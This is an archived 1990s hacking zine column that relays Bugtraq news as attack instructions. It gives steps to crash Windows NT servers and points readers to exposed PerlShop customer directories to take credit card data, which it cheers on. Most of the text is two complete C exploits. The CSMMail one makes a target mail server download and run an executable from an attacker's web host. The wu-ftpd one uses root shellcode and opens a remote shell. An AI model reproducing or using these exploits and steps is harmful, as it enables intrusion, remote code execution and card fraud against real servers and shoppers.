TUCoPS :: Unix :: General :: suid1.txt

SUIDcyde - More bugs & Exploits

-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[::::[ SUIDcyde ]:::::::[OO--[ by Bodie ]----------[ bodi3@usa.net ]---
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

Welcome to the new regular hacking section in faith, this section is devoted
to the latest news, techniches and exploits in hacking.  Enjoy
----------
Bugtraq watch

As a regular colum now in faith i'll be telling everyone what is going on in
the worlds greatest mailing list - bugtraq, it's where all the latest
exploits get posted to and it's the best list for security.

Recently there have been several bugs reported.  Possibly the most severe one
was a report of being able to remotly reboot an NT machine.  This is how to
do it:

find an NT box running SP4 (service pack 4) 
Telnet to port 1723
type 256 'h' charictors and hit return
Press ^D

This hopefully should cause the machine to completely reboot and cause
microshaft a few more headaches which is always good news for our favorite
linux servers :).  This bug hasn't been confirmed yet and some people haven't
been able to get it to work, but give it a go anyway

Possibly the most serious flaw uncovered recently was an exploit in some
online shopping services, some of these are run on a software package called
perlshop.  With this you can get peoples credit card info which is always
nice :)

For this one all you have to do is find a site running the software (it may
tell you that it is on the web page) and go to the directory:
www.vulnerable.com/store/customers/
or it may be in:
www.vulnerable.com/store/temp_customers/

This bug is likely to be fixed extreemly quickly so if ya wanna exploit it,
ya better hurry up :)

There has also been reported buffer overflows in the windows CSMMail SMTP
server.  Time for some exploit code:

<--------------------------CUT HERE------------------------->

#define UNIX

#ifndef UNIX
 #include <stdio.h>
 #include <fcntl.h>
 #include <winsock.h>
 #include <io.h>
 #define CLOSE _close
 #define SLEEP Sleep

#else
 #include <stdio.h>
 #include <unistd.h>
 #include <fcntl.h>
 #include <netdb.h>
 #include <netinet/in.h>
 #include <sys/socket.h>
 #include <arpa/inet.h>
 #define CLOSE close
 #define SLEEP sleep
#endif

/*
 CSMMail Exploit by _mcp_ <pw@nacs.net>
 Win32 port and sp3 address's by Acpizer <acpizer@unseen.org>

 Greets go out to the following people: Morpheus, Sizban, Rocket,
   Acpizer, Killspree, Ftz, Dregvant, Vio, Symbiont, Coolg, Henk, #finite
   and #win32asm.

 You can contact me by e-mail or on efnet.


 As always no greets go out to etl

*/


const unsigned long FIXUP1 = 264;
const unsigned long FIXUP2 = 268;
const unsigned long OFFSET = 260;

char code[] =
"\xEB\x53\xEB\x20\x5B\xFC\x33\xC9\xB1\x82\x8B\xF3\x80\x2B\x1"
"\x43\xE2\xFA\x8B\xFB\xE8\xE9\xFF\xFF\xFF\xE8\xE4\xFF\xFF\xFF"
"\xEB\x37\x46\x58\xFF\xE0\x33\xDB\xB3\x48\xC1\xE3\x10\x66\xBB"
"\x94\x62\x56\xFF\x13\x8B\xE8\x46\x33\xC0\x3A\x6\x75\xF9\x46"
"\x83\xC0\x1\x3A\x6\x74\xDD\x56\x55\x33\xDB\xB3\x48\xC1\xE3"
"\x10\x66\xBB\xB8\x62\xFF\x13\xAB\xEB\xDF\xEB\x4F\x33\xC9\x66"
"\x49\xC1\xC1\x2\x51\x33\xC0\x51\x50\xFF\x57\xE8\x8B\xE8\x33"
"\xC9\x51\x51\x51\x51\x57\xFF\x57\xF4\x33\xC9\x51\x51\x51\x51"
"\x56\x50\xFF\x57\xF8\x59\x57\x51\x55\x50\xFF\x57\xFC\x83\xC6"
"\x7\x33\xC9\x51\x56\xFF\x57\xDC\xFF\x37\x55\x50\x8B\xE8\xFF"
"\x57\xE0\x55\xFF\x57\xE4\x33\xC9\x51\x56\xFF\x57\xEC\xFF\x57"
"\xF0\xE8\x59\xFF\xFF\xFF\x4C\x46\x53\x4F\x46\x4D\x34\x33\x1"
"\x60\x6D\x64\x73\x66\x62\x75\x1\x60\x6D\x78\x73\x6A\x75\x66"
"\x1\x60\x6D\x64\x6D\x70\x74\x66\x1\x48\x6D\x70\x63\x62\x6D"
"\x42\x6D\x6D\x70\x64\x1\x58\x6A\x6F\x46\x79\x66\x64\x1\x46"
"\x79\x6A\x75\x51\x73\x70\x64\x66\x74\x74\x1\x2\x58\x4A\x4F"
"\x4A\x4F\x46\x55\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50\x71"
"\x66\x6F\x42\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50\x71\x66"
"\x6F\x56\x73\x6D\x42\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x53"
"\x66\x62\x65\x47\x6A\x6D\x66\x1\x2\x69\x75\x75\x71\x3B\x30"
"\x30\x00";


    /*This is the encrypted /~pw/owned.exe we paste at the end */
char dir[] =
"\x30\x7f\x71\x78\x30\x70\x78\x6f\x66\x65\x2F\x66\x79\x66\x1\x0";


unsigned int getip(char *hostname)
  {
  struct hostent *hostinfo;
  unsigned int binip;

  hostinfo = gethostbyname(hostname);

  if(!hostinfo)
    {
      printf("cant find: %s\n",hostname);
      exit(0);
    }
#ifndef UNIX
  memcpy((char  *)&binip, hostinfo -> h_addr, hostinfo -> h_length);
#else
  bcopy(hostinfo -> h_addr, (char  *)&binip, hostinfo -> h_length);
#endif
  return(binip);
  }


int usages(char *fname)
{						
      printf("CSMMail Remote Buffer Overflow exploit v1.1 by _mcp_ <pw@nacs.net>.\n");
      printf("Win32 porting and nt sp3 address's by Acpizer <acpizer@unseen.org>\n");
      printf("Usages: \n");
      printf("%s <target host> <www site> <fixup address> <return address>\n", fname);
      printf("win98 SP1:\n");
      printf("        <fixup address>  = 0xBFF78030\n");
      printf("        <return address> = 0xBFF79243\n");
      printf("NT SP3:\n");
      printf("        <fixup address>  = 0x77EB14C0\n");
      printf("        <return address> = 0x77E53FC7\n");
      printf("NT SP4:\n");
      printf("        <fixup address>  = 0x77EB14C0\n");
      printf("        <return address> = 0x77E9A3A4\n");
      printf("Will make <target host> running CSMMail download, save, and\n");
      printf("execute http://<www site>/~pw/owned.exe\n");

exit(0);

}


main (int argc, char *argv[])
{
  int sock,targethost,sinlen;
  struct sockaddr_in sin;
  static unsigned char buffer[20000];
  unsigned char *ptr,*ptr2;
  unsigned long ret_addr;
  int len,x = 1;
  unsigned long rw_mem;


#ifndef UNIX
  WORD wVersionRequested;
  WSADATA wsaData;
  int err;

  wVersionRequested = MAKEWORD( 2, 2 );
  err = WSAStartup( wVersionRequested, &wsaData );
  if (err != 0) exit(1);
#endif
  if (argc < 5) usages(argv[0]);


  targethost = getip(argv[1]);


   len = strlen(argv[2]);
    if (len > 60)
     {
       printf("Bad http format!\n");
       usages(argv[0]);
     }

   ptr = argv[2];
   while (x <= len)
      {
        x++;
        (*ptr)++;           /*Encrypt the http ip for later parsing */
        ptr++;
      }

  if( (sscanf(argv[3],"0x%x",(unsigned long *) &rw_mem)) == 0)
    {
      printf("Input Error, the fixup memory address has incorrect format\n");
      exit(0);
    }
  if( (sscanf(argv[4],"0x%x",(unsigned long *) &ret_addr)) == 0)
    {
      printf("Input error, the return address has incorrect format\n");
      exit(0);
    }


  sock = socket(AF_INET,SOCK_STREAM,0);

  sin.sin_family = AF_INET;
  sin.sin_addr.s_addr = targethost;
  sin.sin_port = htons(25);
  sinlen = sizeof(sin);


  printf("Starting to create the egg\n");
  ptr = (char *)&buffer;
  strcpy(ptr,"VRFY ");
  ptr+=5;

  memset((void *)ptr, 0x90, 7000);

  ptr2=ptr;
  ptr2+=FIXUP1;
  memcpy((void *) ptr2,(void *) &rw_mem,4);
  ptr2=ptr;
  ptr2+=FIXUP2;
  memcpy((void *) ptr2,(void *) &rw_mem,4);

  ptr+=OFFSET;
  memcpy ((void *) ptr,(void *)&ret_addr, 4);
  ptr+=60;
  memcpy((void *) ptr,(void *)&code,strlen(code));


  (char *) ptr2 = strstr(ptr,"\xb1");
  if (ptr2 == NULL)
     {
       printf("Bad shell code\n");
       exit(0);
     }
  ptr2++;
  (*ptr2)+= len + ( sizeof(dir) - 1 );

   (char *) ptr2 = strstr(ptr,"\x83\xc6");
     if (ptr2 == NULL)
      {
        printf("Bad shell code\n");
        exit(0);

      }

  ptr2+= 2;

  (*ptr2)+= len + 8;

  ptr+=strlen(code);
  memcpy((void *) ptr, (void *) argv[2], len);   /*Parse in the http site's info */
  ptr+=len;
  memcpy((void *) ptr,(void*) &dir, sizeof(dir) );
  printf("Made the egg\n");

    if ( connect(sock, (struct sockaddr *)&sin, sinlen) == -1)
     {
       perror("error:");
       exit(0);
     }
    printf("Connected.\n");

#ifndef UNIX
	send(sock, "HELO lamer.com\r\n",16, 0);
	send(sock, (char *)&buffer, strlen((char *)&buffer), 0);
	send(sock,"\r\n",2,0);
#else
    write(sock, "HELO lamer.com\r\n",16);
    write(sock, &buffer, strlen((char *)&buffer) ); /* strlen((char*)&buffer */
    write(sock,"\r\n",2);
#endif
    SLEEP(1);
    printf("Sent the egg\n");
#ifndef UNIX
  WSACleanup();
#endif
    CLOSE(sock);
   exit(1);
}
<--------------------------CUT HERE------------------------->


Also there has been another buffer overflow found in wu-ftpd, a popular ftp
deamon for unix servers.  This only exists in beta versions 12 - 18, and
these aren't the current version, so don't be supprised if you find that not
too many servers are running it.

<--------------------------CUT HERE------------------------->

/*
 * Remote/local exploit for wu-ftpd [12] through [18]
 * gcc w00f.c -o w00f -Wall -O2
 *
 * Offsets/padding may need to be changed, depending on remote daemon
 * compilation options. Try offsets -5000 to 5000 in increments of 100.
 *		
 * Note: you need to use -t >0 for -any- version lower than 18.
 * Coded by smiler and cossack
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>


/* In a beta[12-17] shellcode_A overflow, we will not see responses
to our commands. Add option -c (use chroot code) to fix this. */
unsigned char hellcode_a[]=
        "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /* setuid(0) */
        "\xeb\x2c\x5b\x89\xd9\x80\xc1\x06\x39\xd9\x7c\x07\x80\x01\x20"
        "\xfe\xc9\xeb\xf5\x89\x5b\x08\x31\xc0\x88\x43\x07\x89\x43\x0c"
        "\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x31\xc0\xfe\xc0\xcd"
        "\x80\xe8\xcf\xff\xff\xff\xff\xff\xff"
        "\x0f\x42\x49\x4e\x0f\x53\x48";

unsigned char hellcode_b[]=
	"\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /* setuid(0) */
	"\xeb\x66\x5e\x89\xf3\x80\xc3\x0f\x39\xf3\x7c\x07\x80"
	"\x2b\x02\xfe\xcb\xeb\xf5\x31\xc0\x88\x46\x01\x88\x46"
	"\x08\x88\x46\x10\x8d\x5e\x07\xb0\x0c\xcd\x80\x8d\x1e"
	"\x31\xc9\xb0\x27\xcd\x80\x31\xc0\xb0\x3d\xcd\x80\x31"
	"\xc0\x8d\x5e\x02\xb0\x0c\xcd\x80\x31\xc0\x88\x46\x03"
	"\x8d\x5e\x02\xb0\x3d\xcd\x80\x89\xf3\x80\xc3\x09\x89"
	"\x5b\x08\x31\xc0\x88\x43\x07\x89\x43\x0c\xb0\x0b\x8d"
	"\x4b\x08\x8d\x53\x0c\xcd\x80\x31\xc0\xfe\xc0\xcd\x80"
	"\xe8\x95\xff\xff\xff\xff\xff\xff\x43\x43\x30\x30\x31"
	"\x30\x30\x31\x43\x31\x64\x6b\x70\x31\x75\x6a";


char *Fgets(char *s,int size,FILE *stream);
int ftp_command(char *buf,int success,FILE *out,char *fmt,...);
int double_up(unsigned long blah,char *doh);
int resolv(char *hostname,struct in_addr *addr);
void fatal(char *string);
int usage(char *program);
int tcp_connect(struct in_addr host,unsigned short port);
int parse_pwd(char *in,int *pwdlen);
void RunShell(int thesock);



struct type {
	unsigned long ret_address;
	unsigned char align; /* Use this only to offset \xff's used */
	signed short pad_shift; /* how little/much padding */
	unsigned char overflow_type; /* whether you have to DELE */
	char *name;
};

/* ret_pos is the same for all types of overflows, you only have to change
   the padding. This makes it neater, and gives the shellcode plenty of
   room for nops etc
 */
#define RET_POS 190
#define FTPROOT "/home/ftp"


/* the redhat 5.0 exploit doesn't work at the moment...it must be some
   trite error i am overlooking. (the shellcode exits w/ code 0375) */
struct type types[]={
	{ 0xbffff340, 3, 60, 0,  "BETA-18 (redhat 5.2)", },
        { 0xbfffe30e, 3,-28, 1,  "BETA-16 (redhat 5.1)", },
        { 0xb2ffe356, 3,-28, 1,  "BETA-15 (redhat 5.0)", },
        { 0xbfffebc5, 3,  0, 1,  "BETA-15 (slackware 3.3)", },
        { 0xbffff3b3, 3,  0, 1,  "BETA-15 (slackware 3.4)", },
	{ 0xbffff395, 3,  0, 1,  "BETA-15 (slackware 3.6)", },
        { 0,0,0,0,NULL }
		    };

struct options {
	char start_dir[20];
	unsigned char *shellcode;
	unsigned char chroot;
	char username[10];
	char password[10];
	int offset;
	int t;
} opts;

/* Bit of a big messy function, but hey, its only an exploit */

int main(int argc,char **argv)
{
	char *argv0,ltr;
	char outbuf[1024], inbuf[1024], ret_string[5];
	int pwdlen,ctr,d;
	FILE *cin;
	int fd;
	struct in_addr victim;

	argv0 = strdup(argv[0]);
	*opts.username = *opts.password = *opts.start_dir = 0;
	opts.chroot = opts.offset = opts.t = 0;
	opts.shellcode = hellcode_a;

	while ((d = getopt(argc,argv,"cs:o:t:"))!= -1){
		switch (d) {
		case 'c':
			opts.shellcode = hellcode_b;
			opts.chroot = 1;
			break;
		case 's':
			strcpy(opts.start_dir,optarg);
			break;
		case 'o':
			opts.offset = atoi(optarg);
			break;
		case 't':
			opts.t = atoi(optarg);
			if ((opts.t < 0)||(opts.t>5)) {
				printf("Dont have that type!\n");
				exit(-1);
			}
		}
	}

	argc -= optind;
	argv += optind;
	
	if (argc < 3)
		usage(argv0);

	if (!resolv(argv[0],&victim)) {
		perror("resolving");
		exit(-1);
	}
	strcpy(opts.username,argv[1]);
	strcpy(opts.password,argv[2]);

	if ((fd = tcp_connect(victim,21)) < 0) {
		perror("connect");
		exit(-1);
	}

	if (!(cin = fdopen(fd,"r"))) {
		printf("Couldn't get stream\n");
		exit(-1);
	}

	Fgets(inbuf,sizeof(inbuf),cin);
	printf("%s",inbuf);

	if (ftp_command(inbuf,331,cin,"USER %s\n",opts.username)<0)
		fatal("Bad username\n");
	if (ftp_command(inbuf,230,cin,"PASS %s\n",opts.password)<0)
		fatal("Bad password\n");

	if (*opts.start_dir)
		if (ftp_command(inbuf,250,cin,"CWD %s\n",opts.start_dir)<0)
			fatal("Couldn't change dir\n");

	if (ftp_command(inbuf,257,cin,"PWD\n")<0)
		fatal("PWD\n");				

	if (parse_pwd(inbuf,&pwdlen) < 0)
		fatal("PWD\n");

	srand(time(NULL));
	printf("Making padding directorys\n");
	for (ctr = 0;ctr < 4;ctr++) {
		ltr = rand()%26 + 65;
		memset(outbuf,ltr,194);
		outbuf[194]=0;
		if (ftp_command(inbuf,257,cin,"MKD %s\n",outbuf)<0)
			fatal("MKD\n");
		if (ftp_command(inbuf,250,cin,"CWD %s\n",outbuf)<0)
			fatal("CWD\n");
	}

	/* Make padding directory */

	ctr = 124 - (pwdlen - types[opts.t].align);//180
        //ctr = 152 - (pwdlen - types[opts.t].align);
	ctr -= types[opts.t].pad_shift;
	if (ctr < 0) {
		exit(-1);
	}
	memset(outbuf,'A',ctr+1);
	outbuf[ctr] = 0;
        if (ftp_command(inbuf,257,cin,"MKD %s\n",outbuf)<0)
                fatal("MKD\n");
	if (ftp_command(inbuf,250,cin,"CWD %s\n",outbuf)<0)
		fatal("CWD\n");
	
	memset(outbuf,0x90,195);
	d=0;
	for (ctr = RET_POS-strlen(opts.shellcode);ctr<(RET_POS);ctr++)
		outbuf[ctr] = opts.shellcode[d++];
	double_up(types[opts.t].ret_address-opts.offset,ret_string);
	strcpy(outbuf+RET_POS,ret_string);
	strcpy(outbuf+RET_POS+strlen(ret_string),ret_string);

	printf("Press any key to send shellcode...\n");
	getchar();
	if (ftp_command(inbuf,257,cin,"MKD %s\n",outbuf)<0)
		fatal("MKD\n");
	if (types[opts.t].overflow_type == 1)
		if (ftp_command(inbuf,250,cin,"DELE %s\n",outbuf)<0)
			fatal("DELE\n");
        /* HEH. For type 1 style we add a dele command. This overflow
        occurs in delete() in ftpd.c. The cause is realpath() in realpath.c
	not checking bounds correctly, overwriting path[] in delete(). */

        RunShell(fd);
	return(1);
}

void RunShell(int thesock)
{
	int n;
	char recvbuf[1024];
	fd_set rset;

	while (1)
	{
		FD_ZERO(&rset);
		FD_SET(thesock,&rset);
		FD_SET(STDIN_FILENO,&rset);
		select(thesock+1,&rset,NULL,NULL,NULL);
		if (FD_ISSET(thesock,&rset))
		{
			n=read(thesock,recvbuf,1024);
			if (n <= 0)
			{
				printf("Connection closed\n");
				exit(0);
			}
			recvbuf[n]=0;
			printf("%s",recvbuf);
		}
		if (FD_ISSET(STDIN_FILENO,&rset))
		{
			n=read(STDIN_FILENO,recvbuf,1024);
			if (n>0)
			{
				recvbuf[n]=0;
				write(thesock,recvbuf,n);
			}
		}
	}
	return;
}


int double_up(unsigned long blah, char *doh)
{
	int a;
	unsigned char *ptr,*ptr2;
	bzero(doh,6);
	ptr=doh;
	ptr2=(char *)&blah;
	for (a=0;a<4;a++) {
		*ptr++=*ptr2;
		if (*ptr2==0xff) *ptr++=0xff;
		ptr2++;
	}
	return(1);
}


int parse_pwd(char *in, int *pwdlen)
{
	char *ptr1,*ptr2;

	/* 257 "/" is current directory */
	ptr1 = strchr(in,'\"');
	if (!ptr1) return(-1);
	ptr2 = strchr(ptr1+1,'\"');
	if (!ptr2) return(-1);
	*ptr2 = 0;
	*pwdlen = strlen(ptr1+1);
	/* If its just "/" then it contributes nothing to the RET_POS */
	if (*pwdlen==1) *pwdlen -= 1;
	printf("Home Dir = %s, Len = %d\n",ptr1+1,*pwdlen);
	return(1);
}

int tcp_connect(struct in_addr host,unsigned short port)
{
	struct sockaddr_in serv;
	int fd;

	fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
	bzero(&serv,sizeof(serv));
	memcpy(&serv.sin_addr,&host,sizeof(struct in_addr));
	serv.sin_port = htons(port);
	serv.sin_family = AF_INET;
	if (connect(fd,(struct sockaddr *)&serv,sizeof(serv)) < 0) {
		return(-1);
	}
	return(fd);
}


int ftp_command(char *buf,int success,FILE *out,char *fmt,...)
{
	va_list va;
	char line[1200];
	int val;

	va_start(va,fmt);
	vsprintf(line,fmt,va);
	va_end(va);

	if (write(fileno(out),line,strlen(line)) < 0)
		return(-1);

	bzero(buf,200);
	while(1) {
		Fgets(line,sizeof(line),out);
#ifdef DEBUG
		printf("%s",line);
#endif
		if (*(line+3)!='-') break;
	}
	strncpy(buf,line,200);
	val = atoi(line);
	if (success != val) return(-1);
	return(1);
}

void fatal(char *string)
{
	printf("%s",string);
	exit(-1);
}

char *Fgets(char *s,int size,FILE *stream)
{
	char *ptr;

	ptr = fgets(s,size,stream);
	//if (!ptr)
		//fatal("Disconnected\n");
	return(ptr);
}

int resolv(char *hostname,struct in_addr *addr)
{
        struct hostent *res;

        if (inet_aton(hostname,addr))
                return(1);

        res = gethostbyname(hostname);
        if (res == NULL)
                return(0);

        memcpy((char *)addr,(char *)res->h_addr,sizeof(struct in_addr));
        return(1);
}

int usage(char *program)
{
	fprintf(stderr,"Usage: %s <host> <username> <password> [-c] [-s start_dir]\n",program);
	fprintf(stderr,"\t[-o offset] [-t type]\n");	
	fprintf(stderr,"types:\n");
	fprintf(stderr,"0 - %s\n", types[0].name);
	fprintf(stderr,"1 - %s\n", types[1].name);
        fprintf(stderr,"2 - %s\n", types[2].name);
        fprintf(stderr,"3 - %s\n", types[3].name);
        fprintf(stderr,"4 - %s\n", types[4].name);
        fprintf(stderr,"5 - %s\n", types[5].name);
        fprintf(stderr,"\n");
	exit(0);
}

<--------------------------CUT HERE------------------------->


Thats about all for the moment.  If you want to subscribe to bugtraq
yourself, send a mail to bugtraq@netspace.org with the text subscribe bugtraq
<your e-mail> in the body of the message

Bodie
----------


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH